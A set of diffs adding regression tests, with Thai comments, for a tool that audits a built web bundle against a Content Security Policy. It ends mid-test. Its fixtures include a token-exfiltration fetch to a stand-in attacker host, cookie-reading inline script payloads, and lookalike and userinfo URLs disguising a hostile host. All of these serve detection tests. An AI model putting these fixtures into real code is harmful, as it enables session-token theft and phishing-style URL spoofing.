+  // ไม่งั้นการปิดช่องด้านบนจะกลายเป็นการฟ้องทุกอย่าง ซึ่งทำให้คนเลิกเชื่อ gate เหมือนกัน
+  for (const raw of [
+    'https://fonts.googleapis.com/css2?family=Inter',
+    'https://fonts.gstatic.com/s/inter/v13/x.woff2',
+    'https://FONTS.googleapis.com/css2',
+  ]) {
+    assert.ok(
+      ['https://fonts.googleapis.com', 'https://fonts.gstatic.com'].includes(new URL(raw).origin.toLowerCase()),
+      `fixture ผิด: ${raw} ไม่ได้ชี้ไป origin ที่ policy อนุญาต`
+    );
+    const { dir, cleanup } = makeDist({
+      'index.html': '<!doctype html><html><body>x</body></html>',
+      'assets/ok.js': `const u = "${raw}";`,
+    });
+    try {
+      const { findings } = auditBundle(dir, POLICY);
+      assert.deepEqual(findings, [], `${raw}: ${JSON.stringify(findings)}`);
+    } finally {
+      cleanup();
+    }
+  }
+});
+
+test('เมื่อ parse5 ไม่มี เทสต้องข้ามพร้อมเหตุผลที่บอกวิธีแก้ ไม่ใช่เงียบ', () => {
+  // "ไม่รู้" ต้องไม่กลายเป็น "สะอาด" — การข้ามที่ยอมรับได้ต้องอธิบายตัวเองได้เสมอ
+  // (เทสนี้รันได้ทุกสภาพแวดล้อมโดยตั้งใจ จึงเป็นตัวเดียวในไฟล์ที่ไม่มี skip)
+  if (skip === false) {
+    assert.ok(parse5, 'มี parse5 แล้วต้องไม่ตั้งค่า skip');
+    return;
+  }
+  assert.match(skip, /npm ci/, 'ข้อความ skip ต้องบอกวิธีทำให้เทสรันได้');
+  assert.match(skip, /parse5/, 'ข้อความ skip ต้องบอกว่าขาดอะไร');
+});

--- a/scripts/tests/audit-bundle-csp.test.mjs
+++ b/scripts/tests/audit-bundle-csp.test.mjs
@@ -736,3 +736,93 @@ test('แท็กที่ quote ปิดไม่ครบต้องไม�
     cleanup();
   }
 });
+
+// ── รีวิวรอบที่สี่ (code-reviewer persona) บนคอมมิต c98b9aa ────────────────────
+// critical: guard `quotesBalanced` ที่เพิ่มเข้ามาเพื่อปิดช่องหนึ่ง เปิดอีกช่องหนึ่งแทน
+// เพราะกฎ attribute พึ่งขอบเขตของแท็ก ซึ่ง `>` ในค่า attribute ทำให้ขาดกลางคัน
+
+test('`>` ในค่า attribute ต้องไม่ทำให้ URL หลังจากนั้นหลุด (review critical)', () => {
+  // regex แท็ก `/<[a-zA-Z][^>]*>/` ตัดที่ `>` ตัวแรก — `src` จึงอยู่นอกช่วงที่ถูกตรวจทั้งดุ้น
+  // แล้ว guard quote-ไม่สมดุลก็สั่ง continue ข้ามไปอีก = fail-open สองชั้น
+  const { dir, cleanup } = makeDist({
+    'index.html': '<!doctype html><html><body><img alt="a>b" src="//evil1.example/x.png"></body></html>',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.ok(findings.some((f) => /evil1\.example/.test(f.detail)), JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});
+
+test('การกำหนดค่า .src ในโค้ด JS ก็ทำให้เกิด request จริง ต้องถูกจับ', () => {
+  // เลิกพึ่งขอบเขตแท็กแล้วจับที่คู่ชื่อ-ค่าแทน จึงครอบ `el.src = "//host"` ซึ่งโหลดจริงด้วย
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/img.js': 'const el=new Image();el.src = "//evil2.example/pixel.png";',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.ok(findings.some((f) => /evil2\.example/.test(f.detail)), JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});
+
+test('data-src ต้องไม่ถูกอ่านเป็น src (lookbehind ไม่ใช่ \\b) — กันบั๊กเดิมกลับมา', () => {
+  // `\b` ถือว่า `-` เป็นขอบเขตของคำ ถ้าใช้ `\b` แทน lookbehind บั๊ก review #3 จะกลับมาทันที
+  // ในรูปใหม่ · `data-src` ไม่ใช่ attribute ที่ browser โหลดเอง จึงต้องไม่ถูกฟ้อง
+  const { dir, cleanup } = makeDist({
+    'index.html': '<!doctype html><html><body><div data-src="//lazy.example/x.png"></div></body></html>',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.deepEqual(findings, [], JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});
+
+test('srcset ที่มี data URI ต้องไม่ถูกแตกจนเกิด origin ปลอม', () => {
+  // data URI มี comma อยู่ในตัว การ split(",") จึงได้ชิ้นส่วน base64 ปนมา
+  const { dir, cleanup } = makeDist({
+    'index.html': '<!doctype html><html><body><img srcset="data:image/png;base64,AA//BB 1x, //cdn9.example/b.png 2x"></body></html>',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.ok(findings.some((f) => /cdn9\.example/.test(f.detail)), `ตัวจริงต้องถูกจับ: ${JSON.stringify(findings)}`);
+    assert.ok(!findings.some((f) => /AA\/\/BB|https:\/\/aa/i.test(f.detail)), `base64 ต้องไม่กลายเป็น origin: ${JSON.stringify(findings)}`);
+  } finally {
+    cleanup();
+  }
+});
+
+test('URL ที่ scheme ถูกแต่ host หายต้องไม่กลายเป็น origin ปลอม', () => {
+  // guard `///` เดิมเขียนผูกกับ https จึงไม่ครอบ http · ทั้งสองรูปต้องคืน null เงียบ ๆ
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/odd.js': 'fetch("http:///x");fetch("https:///y");fetch("///z");',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.deepEqual(findings, [], JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});
+
+test('href ของ <a> ถูกฟ้องด้วย — เป็นการตัดสินใจ ไม่ใช่ความพลาด', () => {
+  // static analysis แยก `<a href>` (navigate — CSP ไม่คุม) จาก `<link rel=stylesheet href>`
+  // (subresource — style-src คุม) ไม่ได้ · เลือกฟ้องไว้ก่อนตามหลักการของ issue นี้ และมี
+  // ทางออกคือ NON_FETCHED_ORIGINS ที่บังคับให้เขียนเหตุผลกำกับ · เทสนี้ล็อกพฤติกรรมไว้
+  // ให้เป็นสิ่งที่เลือก ไม่ใช่สิ่งที่หลุด — ถ้าวันหนึ่งตัดสินใจกลับ ต้องมาแก้เทสนี้โดยตั้งใจ
+  const { dir, cleanup } = makeDist({
+    'index.html': '<!doctype html><html><body><a href="//docs.example/guide">x</a></body></html>',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.ok(findings.some((f) => /docs\.example/.test(f.detail)), JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});

--- a/scripts/tests/audit-bundle-csp.test.mjs
+++ b/scripts/tests/audit-bundle-csp.test.mjs
@@ -125,6 +125,78 @@ test('Function( ที่ไม่มี new ต้องถูกจับด�
   }
 });
 
+test('โค้ด JS ปกติที่ขึ้นต้นด้วย on ต้องไม่ถูกจับเป็น inline handler (code review M-A)', () => {
+  // CSP บล็อก handler ที่เป็น attribute ใน markup เท่านั้น — `el.onclick = fn` ในไฟล์ JS
+  // เป็นการ assign property ซึ่งไม่ถูกบล็อก การยิง regex HTML ใส่ JS จึงผิดทั้งเชิงเสียงรบกวน
+  // และเชิงความหมาย · ` once = true` / ` only = 1` เป็นโค้ดปกติที่เคยถูกจับผิด
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/normal.js': 'let once = true; const only = 1; el.onload = fn; el.onclick = go;',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.deepEqual(findings, [], JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});
+
+test('HTML fragment ที่ฝังใน JS พร้อม <script> ยังต้องถูกตรวจ (ไม่ผูกกับนามสกุลอย่างเดียว)', () => {
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/tpl.js': 'const t = `<div><script>alert(1)<\\/script></div>`;',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.ok(findings.some((f) => f.rule === 'inline-script'), JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});
+
+test('origin เดียวที่โผล่หลายครั้งในไฟล์เดียวต้องรายงานรายการเดียวพร้อมจำนวน (code review M-B)', () => {
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/many.js': 'a("https://evil.example.com/1");b("https://evil.example.com/2");c("https://evil.example.com/3");',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    const external = findings.filter((f) => f.rule === 'external-origin');
+    assert.equal(external.length, 1, 'ต้องยุบเป็นรายการเดียวต่อ (ไฟล์ × origin)');
+    assert.match(external[0].detail, /3 ครั้ง/);
+  } finally {
+    cleanup();
+  }
+});
+
+test('การเทียบ origin ต้องไม่แยกตัวพิมพ์ (CSP host-source เป็น case-insensitive)', () => {
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/upper.js': 'const u="HTTPS://FONTS.GSTATIC.COM/s/x.woff2";',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.deepEqual(findings, [], JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});
+
+test('ไฟล์ชื่อซ้ำกับรายการยกเว้นแต่อยู่ในโฟลเดอร์ย่อย ต้องยังถูกตรวจ', () => {
+  // ยกเว้นด้วย path จากราก ไม่ใช่ชื่อไฟล์ล้วน — ไม่งั้นวางไฟล์ชื่อ _redirects ในโฟลเดอร์ย่อย
+  // แล้วซ่อนอะไรก็ได้
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'nested/_redirects': '/x  https://evil.example.com/y  200',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.ok(findings.some((f) => /evil\.example\.com/.test(f.detail)), JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});
+
 test('inline event handler ที่ไม่มีเครื่องหมายคำพูดต้องถูกจับ (code review M2)', () => {
   const { dir, cleanup } = makeDist({
     ...cleanFiles,

--- a/scripts/tests/audit-bundle-csp.test.mjs
+++ b/scripts/tests/audit-bundle-csp.test.mjs
@@ -559,3 +559,77 @@ test('ตัวเลขจำนวนเทสในเอกสารต้�
     `docs/frontend-security-headers.md เขียนว่า ${claimed[1]} เทส แต่ไฟล์นี้มีจริง ${actual} เทส`
   );
 });
+
+// ── รอบรีวิว PR (2026-08-20, comment #5357040475) ──────────────────────────
+// สามข้อล้วนเป็น false clean: gate ตอบ PASS บนของที่ policy จะบล็อกจริง
+// ทุกตัวยืนยันแล้วว่าแดงบนโค้ดก่อนแก้ ด้วยการรัน CLI กับ fixture จริง
+
+test('URL แบบ protocol-relative ที่ถูก fetch ต้องถูกจับ (review #1)', () => {
+  // `//host/x` ไม่ใช่ relative path — browser เติม scheme ของหน้าเว็บแล้วยิงข้าม origin จริง
+  // เงื่อนไขเดิม `!/^https?:\/\//` ตัดทิ้งเพราะเข้าใจว่าเป็น relative และกฎรวมก็บังคับ scheme
+  // เหมือนกัน จึงไม่มีกฎไหนครอบเลย = ช่องที่กว้างที่สุดของ gate นี้
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/exfil.js': 'const s=localStorage.token;fetch("//attacker.example/exfil?d="+s);',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    const hit = findings.find((f) => /attacker\.example/.test(f.detail));
+    assert.ok(hit, JSON.stringify(findings));
+    assert.equal(hit.directive, 'connect-src');
+  } finally {
+    cleanup();
+  }
+});
+
+test('url() แบบ protocol-relative ต้องถูกจับนอกไฟล์ .css ด้วย (review #2)', () => {
+  // กฎ R1 ในไฟล์เดียวกันยึดหลักว่า "ผูกกับรูปทรงของ markup ไม่ใช่ชนิดไฟล์" เพราะบทเรียน C2
+  // แต่ url() กลับถูกผูกกับนามสกุล .css — `<style>` ใน HTML และ CSS-in-JS จึงหลุด
+  const { dir, cleanup } = makeDist({
+    'index.html': '<!doctype html><html><head><style>.h{background:url(//cdn.example.com/bg.png)}</style></head><body></body></html>',
+    'assets/styled.js': 'const css=".x{background:url(//cdn2.example.com/y.png)}";inject(css);',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.ok(findings.some((f) => /cdn\.example\.com/.test(f.detail)), `<style> ใน HTML: ${JSON.stringify(findings)}`);
+    assert.ok(findings.some((f) => /cdn2\.example\.com/.test(f.detail)), `CSS-in-JS: ${JSON.stringify(findings)}`);
+  } finally {
+    cleanup();
+  }
+});
+
+test('data-src / data-type ต้องไม่ทำให้ inline script รอดการตรวจ (review #3)', () => {
+  // `\b` ถือว่า `-` เป็นขอบเขตของคำ `\bsrc\s*=` จึงจับ `data-src=` เป็น "แท็กนี้มี src"
+  // ส่วน type regex เดิมไม่มี `\b` เลย · `data-src` เป็นสำนวนของ deferred-script loader
+  // ที่ใช้จริง (เช่น Rocket Loader) ไม่ใช่เคสสมมติ
+  const { dir, cleanup } = makeDist({
+    'index.html': '<!doctype html><html><body><script data-src="x">alert(document.cookie)</script></body></html>',
+    'other.html': '<!doctype html><html><body><script data-type="application/json">alert(document.cookie)</script></body></html>',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    const inline = findings.filter((f) => f.rule === 'inline-script');
+    assert.equal(inline.length, 2, `ต้องจับทั้งสองไฟล์: ${JSON.stringify(findings)}`);
+  } finally {
+    cleanup();
+  }
+});
+
+test('src และ type ของจริงต้องยังทำให้ข้ามได้ตามเดิม (กันแก้เกิน)', () => {
+  // คู่ตรงข้ามของเทสบน — แท็กที่มี src จริงคือ external script ที่ script-src 'self' อนุญาต
+  // และ type ที่ browser ไม่ execute คือ data block ไม่ใช่โค้ด
+  const { dir, cleanup } = makeDist({
+    'index.html':
+      '<!doctype html><html><head><script type="module" crossorigin src="/assets/index-abc.js"></script>' +
+      '<script type="application/json">{"a":1}</script>' +
+      '<script type="application/ld+json">{"@context":"x"}</script>' +
+      '<script type="application/json; charset=utf-8">{"b":2}</script></head><body></body></html>',
+    'assets/index-abc.js': 'const a=1;export{a};',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.deepEqual(findings, [], JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});

--- a/scripts/tests/audit-bundle-csp.test.mjs
+++ b/scripts/tests/audit-bundle-csp.test.mjs
@@ -491,6 +491,52 @@ test('finding ของ origin ต้องระบุ directive ตาม poli
   }
 });
 
+test('policy ที่ไม่ประกาศ connect-src ต้อง fallback ไป default-src เหมือน browser (ไม่ใช่ฟ้องทุกปลายทาง)', () => {
+  // ของเดิมอ่าน connect-src ตรง ๆ ได้เซ็ตว่าง แล้วฟ้อง fetch ทุกที่ทั้งที่ default-src อนุญาต
+  // = false positive · กฎ attribute ข้าง ๆ fallback ถูกอยู่แล้ว ความไม่สอดคล้องจึงซ่อนอยู่
+  const policy = "default-src 'self' https://api.example.com; script-src 'self'";
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/api.js': 'fetch("https://api.example.com/v1/records");',
+  });
+  try {
+    const { findings } = auditBundle(dir, policy);
+    assert.deepEqual(findings, [], `default-src อนุญาตไว้ จึงต้องไม่ฟ้อง: ${JSON.stringify(findings)}`);
+  } finally {
+    cleanup();
+  }
+});
+
+test('directive ที่รายงานต้องครอบ directive ที่ไม่ใช่ fetch-directive แต่ยืม origin ให้ allowlist รวมได้', () => {
+  // regression ของคลาส "รายการที่พิมพ์ค้างไว้": ของเดิมเป็น array 6 ตัวที่ตกหล่น frame-src /
+  // object-src / form-action ซึ่ง TAG_ATTRIBUTE_DIRECTIVES ใช้จริง — คนอ่านจึงถูกบอกว่า
+  // finding เทียบกับ directive ชุดหนึ่ง ทั้งที่ origin ที่ปล่อยผ่านมาจากอีกชุดหนึ่ง
+  const policy =
+    "default-src 'self'; script-src 'self'; connect-src 'self'; " +
+    'frame-src https://frames.example.com; object-src https://objects.example.com; ' +
+    'form-action https://forms.example.com';
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/loose.js': 'const s = "https://unknown.example.com/x";',
+  });
+  try {
+    const { findings } = auditBundle(dir, policy);
+    const hit = findings.find((f) => /unknown\.example\.com/.test(f.detail));
+    assert.ok(hit, JSON.stringify(findings));
+    for (const directive of ['frame-src', 'object-src', 'form-action']) {
+      assert.match(
+        hit.directive,
+        new RegExp(directive),
+        `${directive} ประกาศ origin ไว้จริง จึงต้องอยู่ในรายการที่รายงาน: ${hit.directive}`,
+      );
+    }
+    // directive ที่ไม่มี origin ภายนอกไม่ได้ยืมอะไรให้ใคร จึงไม่ควรถูกนับว่า "ปรึกษาแล้ว"
+    assert.doesNotMatch(hit.directive, /connect-src/, `connect-src 'self' ไม่มี origin: ${hit.directive}`);
+  } finally {
+    cleanup();
+  }
+});
+
 test('chunk ที่มีทั้ง HTML fragment และโค้ด JS ปกติ ต้องไม่ให้ false positive (review C2)', () => {
   // c8bc7cc แก้ M-A ด้วย guard ระดับ **ไฟล์** — พอ chunk เดียวมีสตริง `<script` ปนอยู่
   // ทั้งไฟล์ถูกพลิกเป็นโหมด HTML แล้ว ` once = ` / ` only = ` ก็ถูกจับผิดกลับมาเหมือนเดิม

--- a/scripts/tests/audit-bundle-csp.test.mjs
+++ b/scripts/tests/audit-bundle-csp.test.mjs
@@ -826,3 +826,109 @@ test('href ของ <a> ถูกฟ้องด้วย — เป็นก�
     cleanup();
   }
 });
+
+// ── รีวิวรอบที่ห้า บนคอมมิต d8482cb ────────────────────────────────────────────
+// สองช่องที่เหลือเป็นคลาสเดียวกับที่ปิดมาแล้วทั้งหมด: **กฎเดาโครงสร้างเอาเองแทนที่จะ parse**
+// กฎ URL เลิกพึ่งขอบเขตแท็กไปแล้วในรอบที่สี่ แต่กฎ handler ยังพึ่งอยู่ · และ origin ของ URL
+// รูปเต็มยังถูกตัดด้วย character class ของตัวเองแทนที่จะให้ URL parser ตัดสิน
+// ทั้งสองยืนยันแล้วว่า gate ตอบ PASS บนโค้ดก่อนแก้ ด้วยการรัน CLI กับ fixture จริง
+
+test('`>` ในค่า attribute ต้องไม่ทำให้ inline event handler หลุด (review จ)', () => {
+  // คู่แฝดของ review critical รอบที่แล้ว — กฎ URL ถูกแก้ให้เลิกพึ่งขอบเขตแท็กไปแล้ว
+  // แต่กฎ handler ยังยิง regex ใส่ `/<[a-zA-Z][^>]*>/` ซึ่งตัดที่ `>` ตัวแรกเหมือนเดิม
+  // `<img alt="a>b" onclick=...>` จึงถูกอ่านเป็น `<img alt="a>` แล้ว handler อยู่นอกช่วงตรวจ
+  const { dir, cleanup } = makeDist({
+    'index.html': '<!doctype html><html><body><img alt="a>b" onclick="alert(document.cookie)"><span>x</span></body></html>',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.ok(findings.some((f) => f.rule === 'inline-event-handler'), JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});
+
+test('host ที่ยืม origin ที่อนุญาตมาเป็นคำนำหน้า ต้องไม่ถูกอ่านเป็น origin นั้น (review ฉ)', () => {
+  // `[a-zA-Z0-9.-]+` หยุดที่ `_` ซึ่งเป็นอักขระที่ host จริงมีได้ — `fonts.googleapis.com_evil.example`
+  // จึงถูกตัดหัวเหลือ `https://fonts.googleapis.com` ซึ่งอยู่ใน style-src → เงียบสนิท
+  // นี่ไม่ใช่แค่ข้อความ error เพี้ยน แต่เป็น false PASS เต็มรูป: ยิ่ง policy อนุญาต origin ไว้มาก
+  // ช่องนี้ยิ่งกว้าง เพราะทุก origin ที่อนุญาตกลายเป็นคำนำหน้าที่ยืมได้
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/lookalike.js': 'const a="https://fonts.googleapis.com_evil.example/steal";',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.ok(
+      findings.some((f) => /fonts\.googleapis\.com_evil\.example/.test(f.detail)),
+      JSON.stringify(findings)
+    );
+  } finally {
+    cleanup();
+  }
+});
+
+test('userinfo ใน URL ต้องไม่ถูกอ่านเป็น host (review ช)', () => {
+  // `https://fonts.gstatic.com@evil.example/steal` — host จริงคือ evil.example ตามมาตรฐาน URL
+  // ส่วนที่อยู่หน้า `@` เป็น userinfo · regex ตัดที่ `@` จึงอ่านได้เป็น origin ที่ font-src อนุญาต
+  // สำนวนนี้เป็นวิธีพราง URL ที่ใช้จริงในฟิชชิ่ง ไม่ใช่เคสสมมติ
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/userinfo.js': 'const a="https://fonts.gstatic.com@evil.example/steal";',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.ok(findings.some((f) => /evil\.example/.test(f.detail)), JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});
+
+test('IPv6 literal รูปเต็มในสตริงลอย ต้องถูกจับเหมือนรูป protocol-relative', () => {
+  // รูป `//[2001:db8::1]/` ถูกปิดไปแล้วใน review ข ผ่าน originOf() แต่รูปเต็ม `http://[…]`
+  // ยังผ่านกฎรวมที่ใช้ character class ของตัวเอง ซึ่ง `[` ไม่เข้าข่ายเลย = ไม่มีกฎไหนครอบ
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/v6full.js': 'const u = "http://[2001:db8::1]/exfil";',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.ok(findings.some((f) => /2001:db8/.test(f.detail)), JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});
+
+test('url() หลายตัวใน declaration เดียว ต้องถูกจับครบทุก origin (กันแก้เกิน)', () => {
+  // คู่ตรงข้ามของสามเทสบน — การขยาย character class ให้กว้างขึ้นต้องไม่กลืน `),` เข้าไป
+  // จนสอง origin กลายเป็นก้อนเดียวแล้วตัวหลังหายไปเงียบ ๆ
+  const { dir, cleanup } = makeDist({
+    'index.html': CLEAN_HTML,
+    'assets/index-abc.js': 'const a=1;export{a};',
+    'assets/multi.css': '.h{background:url(https://cdn1.example/a.png),url(https://cdn2.example/b.png)}',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    for (const origin of [/cdn1\.example/, /cdn2\.example/]) {
+      assert.ok(findings.some((f) => origin.test(f.detail)), `${origin}: ${JSON.stringify(findings)}`);
+    }
+  } finally {
+    cleanup();
+  }
+});
+
+test('โค้ด JS ที่มีตัวดำเนินการเปรียบเทียบ ต้องไม่ถูกอ่านเป็นแท็กแล้วจับ handler ผิด (กันแก้เกิน)', () => {
+  // ตัวแตกแท็กที่เคารพ quote ต้องไม่ทำให้ `a<b && once = true` กลายเป็นแท็กที่ลากยาว
+  // จนไปกิน ` once =` มาเป็น handler — regression เดียวกับ M-A แต่มาจากทางตรงข้าม
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/cmp.js': 'const r = a<b && once = true; const s = x<y && only = 2; el.onclick = go;',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    const noise = findings.filter((f) => f.rule === 'inline-event-handler');
+    assert.deepEqual(noise, [], JSON.stringify(noise));
+  } finally {
+    cleanup();
+  }
+});

--- a/scripts/tests/audit-bundle-csp.test.mjs
+++ b/scripts/tests/audit-bundle-csp.test.mjs
@@ -5,7 +5,7 @@ import { tmpdir } from 'node:os';
 import { dirname, join, resolve } from 'node:path';
 import test from 'node:test';
 import { fileURLToPath } from 'node:url';
-import { auditBundle, parseCspPolicy, NON_FETCHED_ORIGINS } from '../audit-bundle-csp.mjs';
+import { auditBundle, parseCspPolicy, NON_FETCHED_ORIGINS, NON_FETCH_DIRECTIVES } from '../audit-bundle-csp.mjs';
 import { parseRenderHeaders } from '../verify-live-headers.mjs';
 
 // Issue #113 (R2) — regression ของ gate ที่ตรวจ build output ว่าจะชน CSP หลัง enforce ไหม
@@ -46,6 +46,15 @@ const cleanFiles = {
 
 function rulesOf(findings) {
   return findings.map((f) => f.rule).sort();
+}
+
+/**
+ * ชื่อ directive ที่ finding อ้างถึง — ช่อง `directive` เก็บได้ทั้งชื่อเดียวและรายการที่ต่อกัน
+ * ด้วย ` / ` · เทียบเป็น **ชื่อเต็ม** ไม่ใช่ substring เพราะ `style-src` เป็นคำนำหน้าของ
+ * `style-src-elem` — เทสที่ถามด้วย substring จะเขียวทั้งที่ gate ตอบคนละ directive
+ */
+function directivesOf(finding) {
+  return finding.directive.split(' / ');
 }
 
 test('bundle สะอาดต้องไม่มี finding และต้องรายงานว่าอ่านเนื้อหากี่ไฟล์', () => {
@@ -485,7 +494,10 @@ test('finding ของ origin ต้องระบุ directive ตาม poli
     const { findings } = auditBundle(dir, POLICY);
     const hit = findings.find((f) => /cdn\.example\.com/.test(f.detail));
     assert.ok(hit, JSON.stringify(findings));
-    assert.match(hit.directive, /style-src/, `directive ที่รายงานต้องมาจาก policy: ${hit.directive}`);
+    assert.ok(
+      directivesOf(hit).includes('style-src'),
+      `directive ที่รายงานต้องมาจาก policy: ${hit.directive}`,
+    );
   } finally {
     cleanup();
   }
@@ -507,10 +519,10 @@ test('policy ที่ไม่ประกาศ connect-src ต้อง fallb
   }
 });
 
-test('directive ที่รายงานต้องครอบ directive ที่ไม่ใช่ fetch-directive แต่ยืม origin ให้ allowlist รวมได้', () => {
+test('directive ที่รายงานต้องครอบ fetch-directive ทุกตัวที่ยืม origin ให้ allowlist รวมได้', () => {
   // regression ของคลาส "รายการที่พิมพ์ค้างไว้": ของเดิมเป็น array 6 ตัวที่ตกหล่น frame-src /
-  // object-src / form-action ซึ่ง TAG_ATTRIBUTE_DIRECTIVES ใช้จริง — คนอ่านจึงถูกบอกว่า
-  // finding เทียบกับ directive ชุดหนึ่ง ทั้งที่ origin ที่ปล่อยผ่านมาจากอีกชุดหนึ่ง
+  // object-src ซึ่ง TAG_ATTRIBUTE_DIRECTIVES ใช้จริง — คนอ่านจึงถูกบอกว่า finding เทียบกับ
+  // directive ชุดหนึ่ง ทั้งที่ origin ที่ปล่อยผ่านมาจากอีกชุดหนึ่ง
   const policy =
     "default-src 'self'; script-src 'self'; connect-src 'self'; " +
     'frame-src https://frames.example.com; object-src https://objects.example.com; ' +
@@ -523,17 +535,182 @@ test('directive ที่รายงานต้องครอบ directive �
     const { findings } = auditBundle(dir, policy);
     const hit = findings.find((f) => /unknown\.example\.com/.test(f.detail));
     assert.ok(hit, JSON.stringify(findings));
-    for (const directive of ['frame-src', 'object-src', 'form-action']) {
-      assert.match(
-        hit.directive,
-        new RegExp(directive),
+    const reported = directivesOf(hit);
+    for (const directive of ['frame-src', 'object-src']) {
+      assert.ok(
+        reported.includes(directive),
         `${directive} ประกาศ origin ไว้จริง จึงต้องอยู่ในรายการที่รายงาน: ${hit.directive}`,
       );
     }
     // directive ที่ไม่มี origin ภายนอกไม่ได้ยืมอะไรให้ใคร จึงไม่ควรถูกนับว่า "ปรึกษาแล้ว"
-    assert.doesNotMatch(hit.directive, /connect-src/, `connect-src 'self' ไม่มี origin: ${hit.directive}`);
+    assert.ok(!reported.includes('connect-src'), `connect-src 'self' ไม่มี origin: ${hit.directive}`);
+    // form-action คุม "ปลายทางที่ฟอร์ม submit ไป" ไม่ได้อนุญาตให้ bundle โหลดอะไรจากที่นั่น
+    // จึงไม่ใช่ทั้งตัวที่ปล่อยผ่านและตัวที่ควรถูกรายงาน (review รอบที่ 9 — M2)
+    assert.ok(!reported.includes('form-action'), `form-action ไม่ได้คุมการโหลด: ${hit.directive}`);
   } finally {
     cleanup();
+  }
+});
+
+// review รอบที่ 9 — M2: `allowedOriginsFrom()` วน `policy.values()` **ทุก** directive จึงยืม
+// origin จากตัวที่ไม่ได้คุมการโหลด resource เลยมาเป็นใบผ่านให้สตริงใน bundle · คลาสเดียวกับ
+// review C1 (ฟอนต์ยืมให้ fetch) แต่หนักกว่า เพราะ directive พวกนี้ไม่คุม "การโหลด" อะไรเลย
+//
+// เขียนเป็นเทสแยกตัวต่อ directive (ไม่ใช่ลูป) เพราะเทส anti-drift ท้ายไฟล์นับจำนวนเทสจาก
+// จำนวนบรรทัด `test(` — ลูปทำให้ตัวเลขในเอกสารต่ำกว่าจริงเงียบ ๆ ซึ่งคือสิ่งที่เทสนั้นกันอยู่
+function assertDirectiveDoesNotLendOrigin(directive, origin) {
+  const policy = `default-src 'self'; script-src 'self'; connect-src 'self'; ${directive} ${origin}`;
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/loose.js': `const s = "${origin}/x.js";`,
+  });
+  try {
+    const { findings } = auditBundle(dir, policy);
+    const hit = findings.find((f) => f.detail.includes(origin));
+    assert.ok(hit, `${directive} ไม่ได้อนุญาตให้โหลดจาก ${origin} จึงต้องถูกฟ้อง: ${JSON.stringify(findings)}`);
+    assert.ok(!directivesOf(hit).includes(directive), `ห้ามอ้าง ${directive}: ${hit.directive}`);
+  } finally {
+    cleanup();
+  }
+}
+
+test('frame-ancestors ต้องไม่ยืม origin ให้ allowlist รวม (review รอบที่ 9 — M2)', () => {
+  // คุมว่าใคร embed *เรา* ได้ — ไม่ได้อนุญาตให้เราโหลดอะไรจากที่นั่น
+  assertDirectiveDoesNotLendOrigin('frame-ancestors', 'https://portal.example.com');
+});
+
+test('form-action ต้องไม่ยืม origin ให้ allowlist รวม (review รอบที่ 9 — M2)', () => {
+  // คุมปลายทางที่ฟอร์ม submit ไป ซึ่งเป็นคนละเรื่องกับการโหลด subresource
+  assertDirectiveDoesNotLendOrigin('form-action', 'https://forms.example.com');
+});
+
+test('base-uri ต้องไม่ยืม origin ให้ allowlist รวม (review รอบที่ 9 — M2)', () => {
+  // คุมค่าที่ <base href> ตั้งได้ ไม่ได้ทำให้เกิด request ไปยัง origin นั้น
+  assertDirectiveDoesNotLendOrigin('base-uri', 'https://cdn.example.com');
+});
+
+test('form-action ที่ policy อนุญาตไว้ ต้องยังปล่อย <form action> ปลายทางนั้นผ่าน', () => {
